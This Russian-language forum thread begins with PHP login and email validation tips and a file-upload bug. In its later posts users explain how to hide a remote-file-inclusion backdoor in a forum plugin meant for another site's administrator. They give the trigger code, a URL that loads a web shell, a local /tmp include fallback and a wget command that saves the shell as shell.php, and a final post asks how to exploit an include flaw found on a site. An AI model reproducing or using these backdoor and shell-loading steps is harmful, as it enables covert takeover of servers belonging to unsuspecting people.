Ну есть непечатаемые символы, да и пробелы в начале, в середине и в конце логина тоже не нужны (хотя их можно просто обрезать потом) ЗЫ Пишу скрипт регистрации для сервиса hashcracking.info, нужно продумать какие ники там будут возможны...
//оффтоп До сих пор не могу понять почему многие кодеры в своих движках запрещают использовать русские буквы и спецсимволы. А вот пароли не запрещают делать из спецсимволов...парадокс. Если правильно обработать все входящие данные, то никакой опасности они представлять не будут мыло тоже не обязательно запрещать в верхнем регистре, просто потом опустить его в нижний функцией strtolower(), плюс прикрутить подтверждалку по е-мейлу, тада все олени, которые мыло пишут от балды прутся лесом... И ещё)) Многие делают регулярки, чтобы нельзя было в имени мыла писать только одни подчёркивания. А если у меня и на самом деле мыло [email protected] ? хехе Пробелы в конце тоже не страшно...пусть вводят хоть сто пробелов)) trim() в помощь. Спасибо за внимание
Пароли как правило шифруются MD5, и в итоге неважно, какие символы в нём были изначально. Это не применимо к паролям, вдруг юзер хочет сделать себе пасс с пробелами в начале и в конце, а скрипт не предупреждая их удаляет. Итог - юзер, не зная об этом, не может залогиниться.
чёт не втыкаю в чём проблема=// PHP: <?php echo '<form engtype="multipart/form-data" method="post" action="image.php"> <input type="file" name="image" /><br /> <input type="submit" name="submit" /></form> '; if(isset($_POST['submit'])) { if(!empty($_FILES['image'])) { ############# } else { echo 'Пусто'; } } выдаёт пусто.... я уже полчаса туплю не могу вьехать в чём проблема...почему файл в массив не помещается?
У меня есть php скрипт, мне в нем надо сделать что-то тиап уязвимости, т.е. я мог вызвать через этот скрипт шелл: например: www.site.com/script.php?shell=[shell-adress]
так не идет... мне не надо чтобы скрипт постояно инклудил, а когда мне нужно, а то если переменная shell не задана, то вываливает ошибка.
вставляешь в страницу вот это if(@$_GET["hack"] == "yes") include($_GET['file']); а вызываешь вот так http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
Warning: include() [function.include]: URL file-access is disabled in the server configuration Вот такую ошибку нельзя обойти или это только в конфигах меняется?
это что при выключенном параметре, невозможен php-инклудинг? З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...
да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить. Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого <? include ("/tmp/shell.txt") ?>
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи. Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался? А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков: index.php?hack=yes&upload=shell.php
встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;( wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?
ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
